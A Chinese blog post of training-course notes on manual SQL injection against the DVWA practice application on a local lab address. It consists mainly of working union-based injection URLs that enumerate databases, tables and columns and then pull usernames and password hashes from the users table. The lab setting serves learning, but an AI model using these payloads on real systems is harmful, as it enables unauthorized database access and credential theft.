手动漏洞挖掘-SQL注入(安全牛笔记)
2024-09-18 07:56:01
substring_index(USER(),"@",l)-- #是将查询出来的结果进行切分,以@符号的方式切分
’ union select table_name,table_schema from information_schema.tables-- + #查询数据库中所有的库表
查询所有数据库,数据表:
http://192.168.100.129/dvwa/vulnerabilities/sqli/
?id='+union+select+table_name,table_schema+from+information_schema.tables--+'
&Submit=Submit#
统计每个数据库中表的数量:
http://192.168.100.129/dvwa/vulnerabilities/sqli/
?id='+union+select+table_schema,count(*)+from+information_schema.tables group by table_schema--+'
&Submit=Submit#
查询每个库中对应的表:
http://192.168.100.129/dvwa/vulnerabilities/sqli/
?id='+union+select+table_name,table_schema from+information_schema.tables where table_schema='dvwa'--+'
&Submit=Submit#
查询user表中所有的列:
http://192.168.100.129/dvwa/vulnerabilities/sqli/
?id='+union+select+table_name,column_name from+information_schema.columns where table_schema='dvwa' and table_name='users'--+'
&Submit=Submit#
查询user表中的用户和密码:
http://192.168.100.129/dvwa/vulnerabilities/sqli/
?id='+union+select+user_id,password from dvwa.users --+'
&Submit=Submit#
最新文章
- html中table边框属性
- PHP多条件查询 (租房查询)
- Javascript模块化编程(二):AMD规范(转)
- MemCache分布式缓存的一个bug
- C# 绘制统计图(柱状图, 折线图, 扇形图)【转载】
- 畅所欲言第1期 - 从Viola&;Jones的人脸检测说起
- CSS2-3常见的demo列子总结
- HDU 4287 Intelligent IME(string,map,stl,make_pair)
- Android中Json数据读取与创建
- java 覆盖hashCode()深入探讨 代码演示样例
- SQLite 对中文路径的支持(用到了StringToWideChar和Utf8Encode在D7的System单元中自带)
- 非常不错的ASP操作数据库类,支持多数据库MSSQL,ACCESS,ORACLE,MYSQL等
- iPhone、iPad强制关机
- Css的优先级机制
- notepad++代码输出电话号
- SwiftyiRate中文说明
- laravel实现批量添加数据
- 12C新特性--Application Continuity
- wamp因配置错误而导致apache无法启动的问题
- NodeJS错误处理最佳实践
热门文章
- 71、Android上对Cookie的读写操作
- python中WSGI是什么
- boost::interprocess::managed_shared_memory(2)(std::string)
- vue+node+mongoDB 火车票H5(四)---完成静态页面
- Angular ui-route的用法
- matplotlib图像中文乱码(python3.6)
- 测试一个服务器的性能,客户要求向数据库(Sqlserver2012)内 1000/s(每插入一千条数据) 的处理能力
- 解决EF6中表名变成复数的情况
- c++用vector创建二维数组
- XML 之快速入门